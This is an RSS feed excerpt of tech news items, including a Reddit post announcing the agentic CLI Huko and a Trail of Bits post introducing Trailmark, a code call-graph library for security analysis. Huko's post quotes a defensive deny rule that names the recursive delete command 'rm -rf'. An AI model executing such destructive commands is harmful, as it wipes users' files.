<title><![CDATA[Philips Hue smart lights and a whole lot more are over 20 percent off]]></title>
<description><![CDATA[Woot is having a day-long sale on a range of tech, including a mix of new and open-box Philips Hue smart lighting. The retailer’s already-discounted prices are even cheaper today when you enter the code SAVETWENTY at checkout through midnight Central Time. The products included in the sale serve ...]]></description>
<link>https://tsecurity.de/de/3526408/it-nachrichten/philips-hue-smart-lights-and-a-whole-lot-more-are-over-20-percent-off/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3526408/it-nachrichten/philips-hue-smart-lights-and-a-whole-lot-more-are-over-20-percent-off/</guid>
<pubDate>Mon, 18 May 2026 17:16:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Woot is having a day-long sale on a range of tech, including a mix of new and open-box Philips Hue smart lighting. The retailer’s already-discounted prices are even cheaper today when you enter the code SAVETWENTY at checkout through midnight Central Time. The products included in the sale serve as a great introduction to setting […]]]></content:encoded>
</item>
<item>
<title><![CDATA[NASA’s new AI space chip could let spacecraft think for themselves]]></title>
<description><![CDATA[NASA is testing a next-generation space computer chip that could give spacecraft the ability to operate far more independently in deep space. The radiation-hardened processor is showing performance levels hundreds of times beyond current spaceflight computers while surviving punishing tests desig...]]></description>
<link>https://tsecurity.de/de/3519764/ai-nachrichten/nasas-new-ai-space-chip-could-let-spacecraft-think-for-themselves/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3519764/ai-nachrichten/nasas-new-ai-space-chip-could-let-spacecraft-think-for-themselves/</guid>
<pubDate>Fri, 15 May 2026 15:03:32 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[NASA is testing a next-generation space computer chip that could give spacecraft the ability to operate far more independently in deep space. The radiation-hardened processor is showing performance levels hundreds of times beyond current spaceflight computers while surviving punishing tests designed to mimic the harsh conditions of space. The technology could enable AI-powered spacecraft, faster scientific discoveries, and smarter missions to the Moon and Mars.]]></content:encoded>
</item>
<item>
<title><![CDATA[[OC] I was tired of AI tools breaking my terminal workflow, so I built a pipe-friendly CLI that acts like a standard Unix filter (with .git-like state isolation). It's brand new and I need your harsh feedback.]]></title>
<description><![CDATA[Hi, I know this sub is generally (and rightfully) exhausted by the endless wave of "AI wrappers" that try to take over your entire system, force you into clunky web UIs, or dump massive global configs in your home directory. I felt the same way. I wanted to use LLMs for daily dev tasks, but I did...]]></description>
<link>https://tsecurity.de/de/3515987/linux-tipps/oc-i-was-tired-of-ai-tools-breaking-my-terminal-workflow-so-i-built-a-pipe-friendly-cli-that-acts-like-a-standard-unix-filter-with-git-like-state-isolation-its-brand-new-and-i-need-your-harsh-feedback/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3515987/linux-tipps/oc-i-was-tired-of-ai-tools-breaking-my-terminal-workflow-so-i-built-a-pipe-friendly-cli-that-acts-like-a-standard-unix-filter-with-git-like-state-isolation-its-brand-new-and-i-need-your-harsh-feedback/</guid>
<pubDate>Thu, 14 May 2026 09:39:16 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hi,</p> <p>I know this sub is generally (and rightfully) exhausted by the endless wave of "AI wrappers" that try to take over your entire system, force you into clunky web UIs, or dump massive global configs in your home directory.</p> <p>I felt the same way. I wanted to use LLMs for daily dev tasks, but I didn't want a heavy "co-pilot". I wanted a standard, dumb pipe that I could chain with <code>grep</code>, <code>awk</code>, and <code>jq</code>.</p> <p>So I built <strong>Huko</strong>.</p> <p>It’s an open-source CLI tool designed strictly around the Unix philosophy: do one thing, take <code>stdin</code>, and spit out <code>stdout</code> (or JSON).</p> <p>Here is what makes it fit for a proper Linux environment:</p> <ul> <li><strong>Pipes all the way down:</strong> It just reads and writes text. You can drop it into any bash script. <code>cat /var/log/syslog | grep "error" | huko -m -- "summarize the root cause" &gt; report.txt</code></li> <li><strong>State isolation via .huko/:</strong> Context bleed is terrible. Instead of a global daemon, Huko scopes its memory and sessions to the current working directory using a hidden <code>.huko/</code> folder (exactly like how <code>.git/</code> works). You <code>cd</code> in, it remembers the project context. You <code>cd</code> out, it's a clean slate.</li> <li><strong>Controlling the blast radius:</strong> Giving an LLM access to bash is a security nightmare. Huko has built-in regex gating (<code>huko safety deny bash 're:^rm -rf'</code>), scrubs secrets <em>before</em> they leave your machine, and can execute destructive commands inside an isolated Docker container (<code>huko docker run</code>).</li> <li><strong>Two Gears (Lean vs. Full) &amp; Algorithmic Compression:</strong> <ul> <li><strong>Lean Mode:</strong> For quick, one-off pipeline filtering, it runs with a tiny ~400 token overhead. Zero ceremony.</li> <li><strong>Full Mode:</strong> For complex, multi-step execution, it brings in robust task planning and full tool orchestration. To prevent massive context bloat during long sessions, it uses a <strong>pure-algorithmic compression strategy</strong> (inspired by Manus) to prune the context tree locally. No slow, expensive LLM summarization loops—just fast, zero-overhead algorithmic pruning.</li> <li><em>Proof of concept:</em> Full mode's planning is solid enough that a significant portion of Huko's own codebase was actually written, debugged, and refactored by Huko itself.</li> </ul></li> </ul> <p><strong>The Reality Check (Why I'm posting here):</strong></p> <p>Huko is a <strong>brand-new release (v0.x)</strong>.</p> <p>Even though it successfully bootstrapped part of its own codebase, let's be real: running in my solitary environment is different from surviving the wild. It has rough edges, the architecture might have blind spots I haven't considered, and there are almost certainly edge cases in local file handling or standard I/O streams that will break it.</p> <p>I'm posting here because I want raw, unfiltered feedback from Linux power users.</p> <ul> <li>Does this approach to state management actually make sense to you?</li> <li>Are there glaring security holes in how I handle regex gating?</li> <li>Tear the architecture apart.</li> </ul> <p>If this sounds mildly useful, I’d be honored if you tried to break it. Contributions, issues, or just telling me why this is a terrible idea are all highly welcomed.</p> <p><strong>Repo:</strong> <a href="https://github.com/alexzhaosheng/huko">https://github.com/alexzhaosheng/huko</a><br> <strong>Site:</strong> <a href="https://huko.dev/">https://huko.dev</a> (It’s just NPM install and go).</p> <p>Thanks for your time.</p> <p>--------------------------------------</p> <p><strong>Edit: One quick clarification based on some early feedback —</strong></p> <p>I realized some might see this as "just another LLM CLI" (like Simon Willison's excellent <code>llm</code> tool). If you're looking for a quick way to prompt a model and log the response to SQLite, use <code>llm</code>.</p> <p><strong>Huko is a different beast: it’s a full-blown Agent Runtime.</strong></p> <p>The difference isn't just "features," it's the <strong>loop</strong>. In a standard CLI wrapper, <em>you</em> are the loop—you decide what to ask next. In Huko, the <strong>Agent is the loop</strong>. You give it a high-level goal (e.g., <em>"Find the memory leak in this service and fix the test suite"</em>), and it manages the multi-turn execution autonomously. It decides which files to read, which tools to call, and when the task is actually finished. It doesn't just give you a response; it stays until the job is done.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/CatTwoYes"> /u/CatTwoYes </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1tcnfx2/oc_i_was_tired_of_ai_tools_breaking_my_terminal/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1tcnfx2/oc_i_was_tired_of_ai_tools_breaking_my_terminal/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[If a coronal mass ejection knocked out GPS, vintage military tech could save the day by helping us navigate using the stars]]></title>
<description><![CDATA[The B-52 Angle Computer used mechanical celestial navigation techniques capable of surviving electromagnetic disruptions from massive solar storm events.]]></description>
<link>https://tsecurity.de/de/3515070/it-nachrichten/if-a-coronal-mass-ejection-knocked-out-gps-vintage-military-tech-could-save-the-day-by-helping-us-navigate-using-the-stars/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3515070/it-nachrichten/if-a-coronal-mass-ejection-knocked-out-gps-vintage-military-tech-could-save-the-day-by-helping-us-navigate-using-the-stars/</guid>
<pubDate>Wed, 13 May 2026 23:31:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The B-52 Angle Computer used mechanical celestial navigation techniques capable of surviving electromagnetic disruptions from massive solar storm events.]]></content:encoded>
</item>
<item>
<title><![CDATA[New water-powered tech could power batteries that can last hundreds of years without degrading — and are so safe that the electrolytes can be used as 'tofu-brine' for home cooking]]></title>
<description><![CDATA[Chinese scientists developed a non-toxic water battery capable of surviving 120,000 cycles using corrosion-resistant organic polymer structures.]]></description>
<link>https://tsecurity.de/de/3508454/it-nachrichten/new-water-powered-tech-could-power-batteries-that-can-last-hundreds-of-years-without-degrading-and-are-so-safe-that-the-electrolytes-can-be-used-as-tofu-brine-for-home-cooking/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3508454/it-nachrichten/new-water-powered-tech-could-power-batteries-that-can-last-hundreds-of-years-without-degrading-and-are-so-safe-that-the-electrolytes-can-be-used-as-tofu-brine-for-home-cooking/</guid>
<pubDate>Mon, 11 May 2026 23:46:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Chinese scientists developed a non-toxic water battery capable of surviving 120,000 cycles using corrosion-resistant organic polymer structures.]]></content:encoded>
</item>
<item>
<title><![CDATA[Tantek Çelik: May the Focus Be With You!]]></title>
<description><![CDATA[Last weekend at IndieWebCamp I noticed 
James 
had setup his iPhone in grayscale. 
I think I first saw that on 
Jeremy’s 
phone years ago. 
I remember trying it on my iPod Touch for a while, eventually switching back to see color photos.


This morning while chatting with James I asked him about ...]]></description>
<link>https://tsecurity.de/de/3501616/tools/tantek-elik-may-the-focus-be-with-you/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501616/tools/tantek-elik-may-the-focus-be-with-you/</guid>
<pubDate>Fri, 08 May 2026 23:24:11 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="entry-content e-content">
<p>
Last weekend at IndieWebCamp I noticed 
<a href="https://jamesg.blog/">James</a> 
had setup his iPhone in grayscale. 
I think I first saw that on 
<a href="https://@adactio.com/">Jeremy’s</a> 
phone years ago. 
I remember trying it on my iPod Touch for a while, eventually switching back to see color photos.
</p>
<p>
This morning while chatting with James I asked him about his grayscale setup and why. He pointed out it’s less distracting, a calmer experience, and helps him stay focused when he uses his iPhone for specific tasks.
</p>
<p>
I decided to give it another try. The setting is quite buried. Here are the items to tap, starting from your home screen, or wherever you moved your <b>⚙️ Settings</b> app:
</p>
<ul>
<li>⚙️ Settings</li>
<li>🟦 Accessibility &gt;</li>
<li>🟦 Display &amp; Text Size &gt;</li>
<li>Color Filters &gt;</li>
<li>Color Filters (⚫️__) [slide this toggle to the right to turn it on]</li>
<li>Greyscale [tap this and you should see it checked]</li>
</ul>
<p>
James said one more setting has helped him stick with grayscale for years now. 
Triple-press the side button to toggle color/grayscale modes helps quickly switch to color to view a photo or a video, actual color content, then triple-press-side-button to return to a calmer UI.
</p>
<ul>
<li>⚙️ Settings</li>
<li>⏺ Accessibility &gt;</li>
<li>⏺ Accessibility Shortcut &gt;</li>
<li>Color Filters [tap this and you should see it checked]</li>
</ul>
<p>
In addition, I have found the back-tap feature handy and personally more memorable.
Double (or triple) back-tap to toggle color/grayscale mode and toggle back.
</p>
<ul>
<li>⚙️ Settings</li>
<li>⏺ Accessibility &gt;</li>
<li>👆🏻 Touch &gt;</li>
<li>Back Tap &gt;</li>
<li>Double-tap &gt;</li>
<li>Color Filters [tap this and you should see it checked]</li>
</ul>
<p>
When using my phone outside in the sun, I noticed the absence of color made it hard to distinguish or even read some things. I changed a few more settings to improve sunlight readability/usability.
</p>
<ul>
<li>⚙️ Settings</li>
<li>⏺ Accessibility &gt;</li>
<li>⏺ Display &amp; Text Size &gt;</li>
<li>Bold Text (⚫️__) [tap/slide this toggle to the right to turn it on]</li>
<li>Increase Contrast (⚫️__) [tap/slide this too]</li>
<li>Differentiate Without Color (⚫️__) [tap/slide this too]</li>
</ul>
<p>
In the absence of color on my iPhone, I have spent less time using it today, felt more focused when I used it for a specific task, and have started to feel both less compelled to check things, and less of a “rush” when interacting with iPhone apps and their user interfaces.
</p>
<p>
Color saturated apps stripped of their color are starting to feel like older apps or appliances. Switching Spotify playlists felt a bit like pressing station presets on a car radio. Discord felt like an enhanced IRC client. Even some of my rotating lock screen landscape photos have strong Ansel Adams vibes, while my urban lockscreen photos have a calmer dreamlike quality.
</p>
<p>
Perhaps the use of color in modern mobile app user interfaces is the new 
<a href="https://en.wikipedia.org/wiki/Chartjunk">chartjunk</a>, extraneous and distracting from the task at hand, just as classic chartjunk is extraneous and distracting from the information being presented. Most mobile apps seem to be in an attention-seeking arms race against each other, ever more saturated colors to draw you in like a casino.
</p>
<p>
Using a grayscale iPhone user interface for most of the day has felt noticeably calmer. Enough for me to try it again for at least a few days and see how it goes.
</p>
<p>
Thanks again to James for his explanations and encouragement. See his write-up: 
<a href="https://jamesg.blog/2026/05/04/using-greyscale">Using greyscale</a>, when he started, why, why he continues to use it, and instructions for his setup.
</p>
<p>
Try it for yourself and see how it feels.
</p>
<p>
May the Force of your will be with you, free of distractions and dopamine conditioned impulses.
</p>
<h3>Further Reading</h3>
<ul>
<li><time>2018-01-12</time> The New York Times: 
<a href="https://www.nytimes.com/2018/01/12/technology/grayscale-phone.html">Is the Answer to Phone Addiction a Worse Phone?</a> / I’ve gone gray, and it’s great.</li>
<li><time>2018-05-03</time> The Observer: 
<a href="https://observer.com/2018/05/grayscale-can-cure-smartphone-addiction/">Grayscale Is a Quick Cure to Smartphone Addiction—And Here’s How to Use It</a></li>
<li><time>2019-12-01</time> WIRED: 
<a href="https://www.wired.com/story/grayscale-ios-android-smartphone-addiction/">Try Grayscale Mode to Curb Your Phone Addiction</a></li>
</ul>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Trailmark turns code into graphs]]></title>
<description><![CDATA[We’re open-sourcing Trailmark, a library that parses source code into a queryable call graph of functions, classes, call relationships, and semantic metadata, then exposes that graph through a Python API that Claude skills can call directly. Install it now:
uv pip install trailmark
“Defenders thi...]]></description>
<link>https://tsecurity.de/de/3501379/it-security-nachrichten/trailmark-turns-code-into-graphs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501379/it-security-nachrichten/trailmark-turns-code-into-graphs/</guid>
<pubDate>Fri, 08 May 2026 23:18:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>We’re open-sourcing <a href="https://github.com/trailofbits/trailmark">Trailmark</a>, a library that parses source code into a queryable call graph of functions, classes, call relationships, and semantic metadata, then exposes that graph through a Python API that Claude skills can call directly. Install it now:</p>
<p><code>uv pip install trailmark</code></p>
<p>“Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win.” John Lambert’s <a href="https://github.com/JohnLaTwC/Shared/blob/master/Defenders%20think%20in%20lists.%20Attackers%20think%20in%20graphs.%20As%20long%20as%20this%20is%20true%2C%20attackers%20win.md">widely cited observation</a> about network security applies just as well to AI-assisted software analysis.</p>
<p>When Claude reasons about a codebase, it reasons about lists: findings from static analyzers, surviving mutants from mutation testing, and line-by-line coverage reports. But the question that actually matters is a graph question: <em>can untrusted input reach this code, and what breaks if it’s wrong?</em></p>
<p>We built Trailmark to answer that question. It gives Claude a graph to think with instead of a list. We’re also releasing eight Claude Code skills we’ve built on top of it, designed for mutation triage, test vector generation, protocol diagramming, and more.</p>
<h2>When lists fall short</h2>
<p>Mutation testing is a great example of a method that benefits from graph-level reasoning. It’s one of the best ways to measure test quality. It makes small changes to your source code (e.g., swapping a <code>&lt;</code> for <code>&lt;=</code>, replacing <code>+</code> with <code>-</code>) and checks whether your tests catch the difference. Mutants that survive reveal gaps in your test suite that code coverage metrics might miss. The downside is that a mutation testing run on a real codebase can produce hundreds of surviving mutants of varying significance. This is very much a <em>list</em>.</p>
<p>Some surviving mutants are <em>equivalent</em>: the mutation doesn’t change the program’s behavior because of structural or mathematical constraints that the mutation testing tool can’t see. Some are in dead code; some are in error message formatting; some are in the finite field arithmetic that underpins every cryptographic operation in your library. A flat list of surviving mutants doesn’t tell you which is which.</p>
<p>We wanted to know whether Claude could use graph-level reasoning about a codebase to automatically triage surviving mutants by security relevance: which are reachable from untrusted input, which affect high-blast-radius functions, and which represent genuine gaps in security-critical code?</p>
<h2>How Trailmark works</h2>
<p>Trailmark uses <a href="https://tree-sitter.github.io/">tree-sitter</a> for language-agnostic AST parsing and <a href="https://www.rustworkx.org/">rustworkx</a> for high-performance graph traversal. It operates in three phases:</p>
<ol>
<li><strong>Parse</strong>: Walk a directory, extract functions, classes, call edges, type annotations, cyclomatic complexity, and branch counts from source code.</li>
<li><strong>Index</strong>: Load the resulting graph into a rustworkx PyDiGraph with bidirectional ID/index mappings for fast traversal.</li>
<li><strong>Query</strong>: Answer questions: callers, callees, all paths between two nodes, attack surface enumeration, and complexity hotspots.</li>
</ol>
<p>It currently supports 17 languages, including C, Rust, Go, Python, PHP, JavaScript, Solidity, Circom, and Miden Assembly.</p>
<p>The graph is the substrate. The skills are where the analysis happens.</p>
<h2>The skills</h2>
<p>The Trailmark plugin ships eight Claude Code skills that use the graph API as their backbone:</p>
<table>
 <thead>
 <tr>
 <th>Skill</th>
 <th>What it does</th>
 </tr>
 </thead>
 <tbody>
 <tr>
 <td><code>trailmark</code></td>
 <td>Build and query a code graph with pre-analysis passes: blast radius, taint propagation, privilege boundaries, and entrypoint enumeration</td>
 </tr>
 <tr>
 <td><code>diagram</code></td>
 <td>Generate Mermaid diagrams from code graphs: call graphs, class hierarchies, complexity heatmaps, data flow</td>
 </tr>
 <tr>
 <td><code>crypto-protocol-diagram</code></td>
 <td>Extract protocol message flow from source code or specs (RFCs, ProVerif, Tamarin) into annotated sequence diagrams</td>
 </tr>
 <tr>
 <td><code>genotoxic</code></td>
 <td>Triage mutation testing results using graph analysis: classify surviving mutants as equivalent, missing test coverage, or fuzzing targets</td>
 </tr>
 <tr>
 <td><code>vector-forge</code></td>
 <td>Mutation-driven test vector generation: find coverage gaps via mutation testing, then generate Wycheproof-style vectors that close them</td>
 </tr>
 <tr>
 <td><code>graph-evolution</code></td>
 <td>Compare code graphs at two snapshots to surface security-relevant structural changes that text diffs miss</td>
 </tr>
 <tr>
 <td><code>mermaid-to-proverif</code></td>
 <td>Convert Mermaid sequence diagrams into ProVerif formal verification models</td>
 </tr>
 <tr>
 <td><code>audit-augmentation</code></td>
 <td>Project SARIF and weAudit findings onto code graph nodes as annotations, enabling cross-referencing of static analysis results with blast radius and taint data</td>
 </tr>
 </tbody>
</table>
<p>Each skill calls the Trailmark Python API directly. When <code>genotoxic</code> triages a surviving mutant, it queries <code>engine.paths_between</code> to check reachability from untrusted input. When <code>diagram</code> generates a complexity heatmap, it calls <code>engine.complexity_hotspots</code>. The graph is what makes those questions answerable in seconds rather than hours of manual tracing.</p>
<p>Trailmark also ingests SARIF output from static analyzers and <a href="https://blog.trailofbits.com/2024/03/19/read-code-like-a-pro-with-our-weaudit-vscode-extension/">weAudit</a> annotations, mapping external findings onto graph nodes by file and line range. This lets Claude layer static analysis results, audit notes, and mutation testing data onto a single unified graph, then query across all of them.</p>
<h2>What Claude found</h2>
<p>We’ve been using these skills internally on several cryptographic libraries, combining graph analysis with language-appropriate mutation testing frameworks. Here’s what the graph let Claude see that flat lists couldn’t.</p>
<h3>Equivalent mutants are the majority in well-tested crypto</h3>
<p>When we ran mutation testing against an Ed448 implementation in Go, 45 mutants survived out of 583 covered. A flat list of 45 surviving mutants looks like a serious test gap. But when Claude used the Trailmark call graph (332 nodes, 3,259 call edges) to triage via <code>genotoxic</code>, 33 of those 45 (73%) were equivalent mutants. The mutations were unobservable because the code’s mathematical structure constrained values more tightly than the explicit bounds checks that were mutated.</p>
<p>For example, nine surviving mutants modified boundary conditions in NAF (non-adjacent form) digit range checks. These look like real bugs in isolation. But the NAF digits are structurally bounded by the <code>nonAdjacentForm</code> algorithm itself: the values that would trigger the altered boundary can never appear. The graph confirmed these functions were called from specific contexts that made the mutations undetectable.</p>
<p>The 12 genuine gaps were concrete and actionable: a cross-package coverage gap where Go’s coverage profiling attributed execution to the calling package instead of the defining package, a 255-byte context string boundary condition that was never tested, and overflow carry paths in wide-integer parsing that required near-maximum input values that no existing test vector produced.</p>
<h3>Architectural bottlenecks are invisible without a graph</h3>
<p>When Claude built a Trailmark graph of <code>libhydrogen</code>, a compact C cryptographic library, the graph immediately highlighted something that wasn’t obvious from linearly reading the source files: the entire library funnels through a single permutation primitive, <code>gimli_core_u8</code>, which receives 37 direct calls. Every cryptographic operation (hashing, encryption, key exchange, signatures, and password hashing) depends on this one function.</p>
<p>This isn’t a bug. It’s a deliberate design choice common in lightweight crypto libraries. But it means the blast radius of a flaw in Gimli is total. The graph quantified this: a mutation in <code>gimli_core_u8</code> affects 100% of the library’s security-critical functionality. Gimli was also eliminated from the NIST Lightweight Cryptography competition. Together, these facts represent the kind of architectural risk that’s invisible in a line-by-line code review. The graph makes it obvious.</p>
<h3>Mutation testing finds what KATs can’t cover</h3>
<p>For standardized algorithms like Ed25519 or ML-KEM, known-answer tests (KATs) and projects like <a href="https://github.com/google/wycheproof">Wycheproof</a> provide test vectors that exercise edge cases. But for novel constructions (libhydrogen’s combination of Gimli and Curve25519, for instance), independent KATs don’t exist. No one has published “if you give Gimli-based AEAD this input, you should get this output” vectors, because the construction is unique to this library.</p>
<p>This is where mutation testing fills the gap. It doesn’t need reference implementations or published test vectors. It tests whether <em>your</em> tests actually constrain <em>your</em> code’s behavior. The surviving mutants tell you exactly which aspects of the implementation aren’t pinned down by your test suite, regardless of whether anyone else has ever tested that specific construction.</p>
<p>In the RustCrypto/KEMs crates (ML-KEM, X-Wing), <code>vector-forge</code> found that seven surviving mutants targeted NTT multiplication (mutations like replacing <code>*</code> with <code>+</code> in polynomial dot products). These survived because the test suite only exercised NTT through full KEM round-trips. The algebraic properties of NTT were never tested directly. Existing Wycheproof vectors and NIST KATs caught most higher-level issues, but the internal algebraic invariants had no direct coverage.</p>
<h3>Three patterns that showed up everywhere</h3>
<p>Across multiple codebases analyzed with Trailmark, the same patterns emerged:</p>
<ul>
<li>
<p><strong>Blast radius concentrates in arithmetic modules.</strong> In libsodium (1,597 nodes, 9,574 call edges), the ed25519_ref10 module had the highest blast radius, underpinning Ed25519 signatures, Curve25519 key exchange, Ristretto255, and X-Wing KEM. In ML-KEM, the algebra module had a blast radius of 28; every polynomial and matrix operation depended on its Elem arithmetic. Graph analysis consistently identified these modules as the highest-priority targets for thorough testing.</p>
</li>
<li>
<p><strong>Codec parsers are high-value fuzzing targets that rarely get prioritized.</strong> Multiple analyses flagged hex/Base64 decoders and IP address parsers as high-complexity functions with external input exposure. libsodium’s <code>parse_ipv6</code> had a cyclomatic complexity of 18; libhydrogen’s <code>hydro_hex2bin</code> was the most complex function in the entire library, with a cyclomatic complexity of 11. These functions are natural targets for fuzzing, and the graph confirms they’re reachable from untrusted input.</p>
</li>
<li>
<p><strong>Property-based testing is sparse.</strong> Across the Rust cryptographic crates we examined, property-based testing was either absent or incomplete. The KEMs crates had zero property-based tests. Barrett reduction in ML-KEM was tested with only five points, even though exhaustive testing over all 11 million values of q = 3329 is computationally feasible. The graph’s blast radius analysis shows where property-based tests would have the greatest impact.</p>
</li>
</ul>
<h2>Connecting the graph to everything else</h2>
<p>The graph is most useful when it serves as the connective tissue between other analysis tools. When the constant-time analysis skill flags a function, Trailmark tells Claude its blast radius. When mutation testing produces survivors, Trailmark tells Claude which ones are reachable from untrusted input. When an auditor annotates a finding in weAudit, <code>audit-augmentation</code> shows what else in the graph is affected.</p>
<p>We use this internally to write targeted fuzzing harnesses. The graph identifies high-complexity functions reachable from external input; mutation testing identifies which of those functions have test gaps; the combination tells Claude exactly where a fuzzing harness will have the highest marginal value.</p>
<h2>Start querying your codebase</h2>
<p>Trailmark is open source under <a href="https://github.com/trailofbits/trailmark">Apache-2.0</a>. The library is on PyPI; the skills plugin is in the same repository.</p>
<p><strong>Install the library</strong> (required by the skills):</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">uv pip install trailmark</span></span></code></pre>
</figure>
<p><strong>Add the skills to Claude Code:</strong></p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">/plugin marketplace add trailofbits/skills</span></span></code></pre>
</figure>
<p>Then select the Trailmark plugin from the menu.</p>
<p>You can also explore the graph directly from the CLI:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl"><span class="c1"># Full JSON graph</span>
</span></span><span class="line"><span class="cl">trailmark analyze path/to/project
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Analyze a specific language</span>
</span></span><span class="line"><span class="cl">trailmark analyze --language rust path/to/project
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Complexity hotspots</span>
</span></span><span class="line"><span class="cl">trailmark analyze --complexity <span class="m">10</span> path/to/project</span></span></code></pre>
</figure>
<p>Or call the Python API to build your own skills on top of the graph:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-py" data-lang="py"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">trailmark.query.api</span> <span class="kn">import</span> <span class="n">QueryEngine</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">engine</span> <span class="o">=</span> <span class="n">QueryEngine</span><span class="o">.</span><span class="n">from_directory</span><span class="p">(</span><span class="s2">"path/to/project"</span><span class="p">,</span> <span class="n">language</span><span class="o">=</span><span class="s2">"c"</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># What's reachable from this entrypoint?</span>
</span></span><span class="line"><span class="cl"><span class="n">engine</span><span class="o">.</span><span class="n">callees_of</span><span class="p">(</span><span class="s2">"handle_request"</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Call paths from entrypoint to sensitive function</span>
</span></span><span class="line"><span class="cl"><span class="n">engine</span><span class="o">.</span><span class="n">paths_between</span><span class="p">(</span><span class="s2">"handle_request"</span><span class="p">,</span> <span class="s2">"crypto_verify"</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Functions with cyclomatic complexity &gt;= 10</span>
</span></span><span class="line"><span class="cl"><span class="n">engine</span><span class="o">.</span><span class="n">complexity_hotspots</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Run pre-analysis (blast radius, taint, privilege boundaries)</span>
</span></span><span class="line"><span class="cl"><span class="n">engine</span><span class="o">.</span><span class="n">preanalysis</span><span class="p">()</span></span></span></code></pre>
</figure>
<p>The graph API is designed to be called by skills, not just humans. If you’re building Claude Code skills for security analysis, code review, or test generation, Trailmark gives you the structural substrate to ask questions that lists can’t answer.</p>
<p>Seventeen languages. A graph, not a list. <a href="https://github.com/trailofbits/trailmark">The code is on GitHub</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[A good day….]]></title>
<description><![CDATA[Hmm, I haven’t updated my LJ in a while, mainly because I’ve been insanely busy. I pulled my first all-nighter on Monday in quite a while, working on a paper for the Usenix conference in June. Then Tuesday I was up until Midnight finishing up final version of the paper, and getting my taxes done ...]]></description>
<link>https://tsecurity.de/de/3501136/unix-server/a-good-day/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501136/unix-server/a-good-day/</guid>
<pubDate>Fri, 08 May 2026 23:04:38 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hmm, I haven’t updated my LJ in a while, mainly because I’ve been insanely busy. I pulled my first all-nighter on Monday in quite a while, working on a paper for the Usenix conference in June. Then Tuesday I was up until Midnight finishing up final version of the paper, and getting my taxes done and filed. (Thank goodness New Englanders get an extra day this year to file taxes due to Patriot’s day!)</p>
<p>Today, I recovered from the last two days, and start catching up on stuff which I neglected due to the short-term deadlines that had been keeping me busy. I also went to see a Dar William’s concert tonight in Club Passim! I was lucky, and managed to get seats right up front and center. She was amazing, and it was a real treat to hear her perform in such a small, intimate setting.</p>
<p>I managed to take some pictures of her using my new Canon S-40 camera. It’s really wonderful; it has enough sensitivity that you can take pictures with the flash disabled, and they’re still not half-bad. I can even take capture some <a href="https://thunk.org/tytso/images/2002.darwilliams/crw_0004.wav">audio samples</a> to go with some of the pictures!</p>
<p><a href="https://thunk.org/tytso/images/2002.darwilliams"><img src="https://thunk.org/tytso/images/2002.darwilliams/thumb/crw_0004.jpg" alt=""></a></p>
<p>I can’t wait until the Canon D-60 which I have on order shows up. That will be even better at taking low-light shots without a flash….</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Followups to the ebooks ethical question]]></title>
<description><![CDATA[When I have a moment, I’ll try to tally up the responses that I got to “An ethical question involving ebooks”and see if there are any interesting patterns based on self-identified generational markers.  Obviously, this is not a properly controlled survey, so the results aren’t going to mean much,...]]></description>
<link>https://tsecurity.de/de/3500992/unix-server/followups-to-the-ebooks-ethical-question/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500992/unix-server/followups-to-the-ebooks-ethical-question/</guid>
<pubDate>Fri, 08 May 2026 23:01:28 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
